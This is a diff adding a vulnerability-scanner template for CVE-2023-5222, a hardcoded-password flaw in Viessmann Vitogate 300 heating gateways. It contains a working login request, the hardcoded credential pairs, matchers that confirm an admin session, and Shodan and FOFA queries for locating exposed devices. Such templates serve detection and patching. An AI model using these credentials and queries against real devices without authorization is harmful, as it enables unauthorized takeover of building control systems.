diff --git a/http/cves/CVE-2023-5222.yaml b/http/cves/CVE-2023-5222.yaml new file mode 100644 index 0000000000..5068ade726 --- /dev/null +++ b/http/cves/CVE-2023-5222.yaml @@ -0,0 +1,69 @@ +id: CVE-2023-5222 + +info: + name: Viessmann Vitogate 300 - Hardcoded Password + author: ritikchaddha + severity: critical + description: | + A critical vulnerability in Viessmann Vitogate 300 up to 2.1.3.0 allows attackers to authenticate using hardcoded credentials in the Web Management Interface. + impact: | + An attacker could potentially gain unauthorized access to the device. + remediation: | + Update the device firmware to remove the hardcoded password or change it to a strong, unique password. + reference: + - https://vuldb.com/?ctiid.240364 + - https://vuldb.com/?id.240364 + - https://nvd.nist.gov/vuln/detail/CVE-2023-5222 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-5222 + cwe-id: CWE-259 + epss-score: 0.00164 + epss-percentile: 0.52433 + cpe: cpe:2.3:o:viessmann:vitogate_300_firmware:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + shodan-query: title:"Vitogate 300" + fofa-query: title="Vitogate 300" + vendor: viessmann + product: vitogate_300_firmware + tags: cve,cve2023,viessmann,vitogate,default-login + +http: + - raw: + - | + POST /cgi-bin/vitogate.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"method":"put","form":"form-login","params":{"uid":"{{username}}","pwd":"{{password}}"}} + + attack: pitchfork + payloads: + username: + - vitomaster + - vitogate + password: + - viessmann1917 + - viessmann + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'admin":true' + - '"sessionId":' + condition: and + + - type: word + part: content_type + words: + - 'application/json' + + - type: status + status: + - 200